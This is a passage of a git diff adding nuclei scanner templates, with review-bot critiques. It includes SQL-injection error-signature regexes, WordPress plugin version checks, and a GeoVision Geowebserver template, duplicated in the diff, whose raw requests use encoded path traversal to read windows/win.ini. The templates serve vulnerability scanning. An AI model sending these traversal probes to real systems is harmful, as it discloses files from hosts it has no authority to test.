SQL Server" + - "\\bSQL Server[^<"]+Driver" + - "Warning.*?\\W(mssql|sqlsrv)_" + - "\\bSQL Server[^<"]+[0-9a-fA-F]{8}" + - "System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)" + - "(?s)Exception.*?\\bRoadhouse\\.Cms\\." + - "Microsoft SQL Native Client error '[0-9a-fA-F]{8}" + - "\\[SQL Server\\]" + - "ODBC SQL Server Driver" + - "ODBC Driver \\d+ for SQL Server" + - "SQLServer JDBC Driver" + - "com\\.jnetdirect\\.jsql" + - "macromedia\\.jdbc\\.sqlserver" + - "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception" + - "com\\.microsoft\\.sqlserver\\.jdbc" + - "Pdo[./_\\\\](Mssql|SqlSrv)" + - "SQL(Srv|Server)Exception" + - "Unclosed quotation mark after the character string" + + - type: regex + name: MicrosoftAccess + regex: + - "Microsoft Access (\\d+ )?Driver" + - "JET Database Engine" + - "Access Database Engine" + - "ODBC Microsoft Access" + - "Syntax error \\(missing operator\\) in query expression" + + - type: regex + name: Oracle + regex: + - "\\bORA-\\d{5}" + - "Oracle error" + - "Oracle.*?Driver" + - "Warning.*?\\W(oci|ora)_" + - "quoted string not properly terminated" + - "SQL command not properly ended" + - "macromedia\\.jdbc\\.oracle" + - "oracle\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Oracle_Exception" + - "Pdo[./_\\\\](Oracle|OCI)" + - "OracleException" + + - type: regex + name: IBMDB2 + regex: + - "CLI Driver.*?DB2" + - "DB2 SQL error" + - "\\bdb2_\\w+\\(" + - "SQLCODE[=:\\d, -]+SQLSTATE" + - "com\\.ibm\\.db2\\.jcc" + - "Zend_Db_(Adapter|Statement)_Db2_Exception" + - "Pdo[./_\\\\]Ibm" + - "DB2Exception" + - "ibm_db_dbi\\.ProgrammingError" + + - type: regex + name: Informix + regex: + - "Warning.*?\\Wifx_" + - "Exception.*?Informix" + - "Informix ODBC Driver" + - "ODBC Informix driver" + - "com\\.informix\\.jdbc" + - "weblogic\\.jdbc\\.informix" + - "Pdo[./_\\\\]Informix" + - "IfxException" + + - type: regex + name: Firebird + regex: + - "Dynamic SQL Error" + - "Warning.*?\\Wibase_" + - "org\\.firebirdsql\\.jdbc" + - 
"Pdo[./_\\\\]Firebird" + + - type: regex + name: SQLite + regex: + - "SQLite/JDBCDriver" + - "SQLite\\.Exception" + - "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException" + - "Warning.*?\\W(sqlite_|SQLite3::)" + - "\\[SQLITE_ERROR\\]" + - "SQLite error \\d+:" + - "sqlite3.OperationalError:" + - "SQLite3::SQLException" + - "org\\.sqlite\\.JDBC" + - "Pdo[./_\\\\]Sqlite" + - "SQLiteException" + + - type: regex + name: SAPMaxDB + regex: + - "SQL error.*?POS([0-9]+)" + - "Warning.*?\\Wmaxdb_" + - "DriverSapDB" + - "-3014.*?Invalid end of SQL statement" + - "com\\.sap\\.dbtech\\.jdbc" + - "\\[-3008\\].*?: Invalid keyword or missing delimiter" + + - type: regex + name: Sybase + regex: + - "Warning.*?\\Wsybase_" + - "Sybase message" + - "Sybase.*?Server message" + - "SybSQLException" + - "Sybase\\.Data\\.AseClient" + - "com\\.sybase\\.jdbc" + + - type: regex + name: Ingres + regex: + - "Warning.*?\\Wingres_" + - "Ingres SQLSTATE" + - "Ingres\\W.*?Driver" + - "com\\.ingres\\.gcf\\.jdbc" + + - type: regex + name: FrontBase + regex: + - "Exception (condition )?\\d+\\. Transaction rollback" + - "com\\.frontbase\\.jdbc" + - "Syntax error 1. Missing" + - "(Semantic|Syntax) error \\[1-4\\]\\d{2}\\." 
+ + - type: regex + name: HSQLDB + regex: + - "Unexpected end of command in statement \\[" + - "Unexpected token.*?in statement \\[" + - "org\\.hsqldb\\.jdbc" + + - type: regex + name: H2 + regex: + - "org\\.h2\\.jdbc" + - "\\[42000-192\\]" + + - type: regex + name: MonetDB + regex: + - "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)" + - "\\[MonetDB\\]\\[ODBC Driver" + - "nl\\.cwi\\.monetdb\\.jdbc" + + - type: regex + name: ApacheDerby + regex: + - "Syntax error: Encountered" + - "org\\.apache\\.derby" + - "ERROR 42X01" + + - type: regex + name: Vertica + regex: + - ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):" + - "/vertica/Parser/scan" + - "com\\.vertica\\.jdbc" + - "org\\.jkiss\\.dbeaver\\.ext\\.vertica" + - "com\\.vertica\\.dsi\\.dataengine" + + - type: regex + name: Mckoi + regex: + - "com\\.mckoi\\.JDBCDriver" + - "com\\.mckoi\\.database\\.jdbc" + - "<REGEX_LITERAL>" + + - type: regex + name: Presto + regex: + - "com\\.facebook\\.presto\\.jdbc" + - "io\\.prestosql\\.jdbc" + - "com\\.simba\\.presto\\.jdbc" + - "UNION query has different number of fields: \\d+, \\d+" + + - type: regex + name: Altibase + regex: + - "Altibase\\.jdbc\\.driver" + + - type: regex + name: MimerSQL + regex: + - "com\\.mimer\\.jdbc" + - "Syntax error,[^\\n]+assumed to mean" + + - type: regex + name: CrateDB + regex: + - "io\\.crate\\.client\\.jdbc" + + - type: regex + name: Cache + regex: + - "encountered after end of query" + - "A comparison operator is required here" + + - type: regex + name: RaimaDatabaseManager + regex: + - "-10048: Syntax error" + - "rdmStmtPrepare\\(.+?\\) returned" + + - type: regex + name: Virtuoso + regex: + - "SQ074: Line \\d+:" + - "SR185: Undefined procedure" + - "SQ200: No table " + - "Virtuoso S0002 Error" + - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" + + - type: regex + name: HQLSQL + regex: + - "org\\.hibernate\\.QueryException:" + - "org\\.hibernate\\.exception\\.SQLGrammarException" + - 
"mismatched input ''" + - '' + diff --git a/poc/web/geowebserver-lfi-xss.yaml b/poc/web/geowebserver-lfi-xss.yaml new file mode 100644 index 0000000000..181328a74d --- /dev/null +++ b/poc/web/geowebserver-lfi-xss.yaml 
@@ -0,0 +1,50 @@ +id: geovision-geowebserver-lfi-xss + +info: + name: GeoVision Geowebserver <= 5.3.3 - Local File Inclusion / Cross-Site Scripting + author: shamo0 + severity: high + description: | + GEOVISION GEOWEBSERVER <= 5.3.3 is vulnerable to several XSS, HTML Injection, and Local File Include (LFI) vectors. The application fails to properly sanitize user requests, allowing injection of HTML code and XSS, as well as client-side exploitation, including session theft. + reference: + - https://www.geovision.com.tw/cyber_security.php + - https://www.exploit-db.com/exploits/50211 + metadata: + verified: true + max-request: 3 + shodan-query: title:"Geowebserver" + tags: geovision,geowebserver,lfi,xss + +http: + - raw: + - | + GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name= HTTP/1.1 + Host: {{Hostname}} + + - | + POST /Visitor/bin/WebStrings.srf?obj_name=win.ini HTTP/1.1 + Host: {{Hostname}} + Content-Length: 0 + + - | + GET /Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows\win.ini HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: or + matchers: + - type: dsl + name: lfi + dsl: + - 'contains_all(body, "for 16-bit", "[fonts]", "[extensions]")' + - 'contains(content_type, "application/octet-stream")' + - 'status_code == 200' + condition: and + + - type: dsl + name: xss + dsl: + - 'contains_all(body, "={\"AeDebug")' + - 'contains(content_type, "text/html")' + - 'status_code == 200' + condition: and +# digest: 4a0a00473045022073fb6629bd8a91705b1061035210bcd66d24136bb813085100ac437c95f8270f022100cb45f86cc14cf6cd92ce6bac43aa9e3e4c202a1df313a7489b1855c0cb36dfa5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
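Review bot: The matcher named `xss` does not exercise cross-site scripting: none of the three raw requests carries a script or HTML payload — all three are path-traversal reads of `windows/win.ini` through `/Visitor/bin/WebStrings.srf` or the `%252e%252e%252f`-prefixed `/Visitor//` path — so a hit on `contains_all(body, "={\"AeDebug")` with a `text/html` content type only shows the file contents echoed into an HTML page, which is still file disclosure, not injection. Either rename it (`name: lfi-html`) so the result is not reported as XSS, or add a request that carries a reflected marker and match on that, if the reflection vector from the exploit-db reference is meant to be covered; as written the `xss` tag in `tags:` and the title are not backed by any test. Because `matchers-condition: or` already accepts any single hit, add `stop-at-first-match: true` under `http:` so the remaining traversal requests are not sent once one has confirmed the read. The template is also Windows-specific (it only recognises `win.ini`), which is worth a one-line comment above the requests, e.g. `# Windows-only: all three probes read win.ini`.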
diff --git a/poc/wordpress/spotify-play-button-for-wordpress-6157ddc840ff3aaacb724f29e67883ff.yaml b/poc/wordpress/spotify-play-button-for-wordpress-6157ddc840ff3aaacb724f29e67883ff.yaml new file mode 100644 index 0000000000..0033c6e313 --- /dev/null +++ b/poc/wordpress/spotify-play-button-for-wordpress-6157ddc840ff3aaacb724f29e67883ff.yaml @@ -0,0 +1,59 @@ +id: spotify-play-button-for-wordpress-6157ddc840ff3aaacb724f29e67883ff + +info: + name: > + Spotify Play Button for WordPress <= 2.11 - Authenticated (Contributor+) Stored Cross-Site Scripting via spotifyplaybutton Shortcode + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a52e43dd-46b4-445b-b350-a2fd76315869?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/spotify-play-button-for-wordpress/" + google-query: inurl:"/wp-content/plugins/spotify-play-button-for-wordpress/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,spotify-play-button-for-wordpress,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/spotify-play-button-for-wordpress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "spotify-play-button-for-wordpress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.11') \ No newline at end of file diff --git a/poc/wordpress/wordpress-popup-be069733ca362578f99c68a45b934c7d.yaml b/poc/wordpress/wordpress-popup-be069733ca362578f99c68a45b934c7d.yaml new file mode 100644 index 0000000000..396d085b20 --- /dev/null 
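Review bot: The `tags` line carries `cve` while `cve-id:`, `cvss-score:` and `cvss-metrics:` are blank and `description: >` is empty, so a finding is emitted with no identifier and no explanation; either populate `cve-id` from the referenced Wordfence advisory or drop the `cve` tag, and give `description` at least the sentence the name already states. The detection is pure version inference from `Stable tag:` in `readme.txt`: the regex `([0-9.]+)` never matches a `Stable tag: trunk` readme, and a readme whose stable tag lags the deployed code is misreported, so the description should say the result is "installed version <= 2.11 according to readme.txt" rather than a confirmed stored XSS — the advisory in the title requires Contributor+ credentials, which this template does not use. The two `version` extractors have identical regexes and differ only in `internal: true`; if the second exists so the version is printed with the result, say so with `# non-internal copy so the matched version appears in output`, otherwise remove one.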
+++ b/poc/wordpress/wordpress-popup-be069733ca362578f99c68a45b934c7d.yaml @@ -0,0 +1,59 @@ +id: wordpress-popup-be069733ca362578f99c68a45b934c7d + +info: + name: > + Hustle – Email Marketing, Lead Generation, Optins, Popups <= 7.8.5 - Missing Authorization to Unpublished Form Exposure + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ebd96d9c-c1ab-4a53-a52a-9fc2541482f2?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wordpress-popup/" + google-query: inurl:"/wp-content/plugins/wordpress-popup/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wordpress-popup,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wordpress-popup/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wordpress-popup" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 7.8.5') \ No newline at end of file diff --git a/poc/wordpress/wp-parsidate-7b898c57c30032aff3f3e6faaf604680.yaml b/poc/wordpress/wp-parsidate-7b898c57c30032aff3f3e6faaf604680.yaml new file mode 100644 index 0000000000..79ec306445 --- /dev/null +++ b/poc/wordpress/wp-parsidate-7b898c57c30032aff3f3e6faaf604680.yaml 
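Review bot: `severity: high` for a missing-authorization issue is reported here on the strength of `compare_versions(version, '<= 7.8.5')` against the readme's `Stable tag:` alone, with no request to the plugin's own endpoints, so the template cannot distinguish a patched site whose readme was not updated from a vulnerable one; the empty `description: >` should state that the result is version-inferred from `readme.txt`, and `cve-id:` should be filled or the `cve` tag removed. The `word` matcher requires the literal slug `wordpress-popup` in the readme body; the plugin's display name in the title is "Hustle", and whether its `readme.txt` contains the directory slug is not something this hunk shows — if it does not, the template silently never fires, so that assumption deserves a comment such as `# readme.txt is expected to mention the plugin slug; verify against a live install`. The `Stable tag: trunk` case is not handled by `([0-9.]+)` either, and a readme in that state yields no `version` and therefore no result rather than an explicit "could not determine version".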
@@ -0,0 +1,59 @@ +id: wp-parsidate-7b898c57c30032aff3f3e6faaf604680 + +info: + name: > + Parsi Date <= 5.1.1 - Reflected Cross-Site Scripting via add_query_arg Parameter + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/72383bd3-82b4-4aea-9a1c-277ad06e2500?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-parsidate/" + google-query: inurl:"/wp-content/plugins/wp-parsidate/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-parsidate,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-parsidate/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-parsidate" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.1.1') \ No newline at end of file diff --git a/poc/xss/geowebserver-lfi-xss.yaml b/poc/xss/geowebserver-lfi-xss.yaml new file mode 100644 index 0000000000..181328a74d --- /dev/null +++ b/poc/xss/geowebserver-lfi-xss.yaml 
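Review bot: The title names a reflected XSS "via add_query_arg Parameter", yet the template only fingerprints `readme.txt` and compares `Stable tag:` with `'<= 5.1.1'`, so a match is a version inference and not a reproduced reflection; the blank `description: >` should say exactly that, and `classification` should either carry the identifier the `cve` tag promises or the tag should go. Nothing in the hunk names the reflecting URL, so no verification request can be added from what is visible here — if the Wordfence reference documents one, a second request matching on a reflected marker would turn this from a version guess into evidence. As in the sibling templates, the duplicate `version` extractor (one `internal: true`, one not) and the unmatched `Stable tag: trunk` case are worth a comment, e.g. `# trunk stable tags yield no version and no finding`.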
@@ -0,0 +1,50 @@ +id: geovision-geowebserver-lfi-xss + +info: + name: GeoVision Geowebserver <= 5.3.3 - Local File Inclusion / Cross-Site Scripting + author: shamo0 + severity: high + description: | + GEOVISION GEOWEBSERVER <= 5.3.3 is vulnerable to several XSS, HTML Injection, and Local File Include (LFI) vectors. The application fails to properly sanitize user requests, allowing injection of HTML code and XSS, as well as client-side exploitation, including session theft. + reference: + - https://www.geovision.com.tw/cyber_security.php + - https://www.exploit-db.com/exploits/50211 + metadata: + verified: true + max-request: 3 + shodan-query: title:"Geowebserver" + tags: geovision,geowebserver,lfi,xss + +http: + - raw: + - | + GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name= HTTP/1.1 + Host: {{Hostname}} + + - | + POST /Visitor/bin/WebStrings.srf?obj_name=win.ini HTTP/1.1 + Host: {{Hostname}} + Content-Length: 0 + + - | + GET /Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows\win.ini HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: or + matchers: + - type: dsl + name: lfi + dsl: + - 'contains_all(body, "for 16-bit", "[fonts]", "[extensions]")' + - 'contains(content_type, "application/octet-stream")' + - 'status_code == 200' + condition: and + + - type: dsl + name: xss + dsl: + - 'contains_all(body, "={\"AeDebug")' + - 'contains(content_type, "text/html")' + - 'status_code == 200' + condition: and +# digest: 4a0a00473045022073fb6629bd8a91705b1061035210bcd66d24136bb813085100ac437c95f8270f022100cb45f86cc14cf6cd92ce6bac43aa9e3e4c202a1df313a7489b1855c0cb36dfa5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file
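Review bot: This file is a byte-for-byte copy of `poc/web/geowebserver-lfi-xss.yaml` added earlier in the same commit, both carrying `id: geovision-geowebserver-lfi-xss`; nuclei treats template IDs as unique, so loading the repository as a whole will, as far as I know, warn about the duplicate and run only one copy, while anyone scanning `poc/xss/` alone still gets an "xss" template that never sends an XSS payload. If the `poc/xss/` placement is intended as a category index, a symlink or a distinct `id` (e.g. `id: geovision-geowebserver-xss-copy`) avoids the collision; better still, keep one file. The same content issue applies here as in the original: the matcher named `xss` matches win.ini content served as `text/html` and proves file disclosure, not injection, so rename it or add a reflection probe.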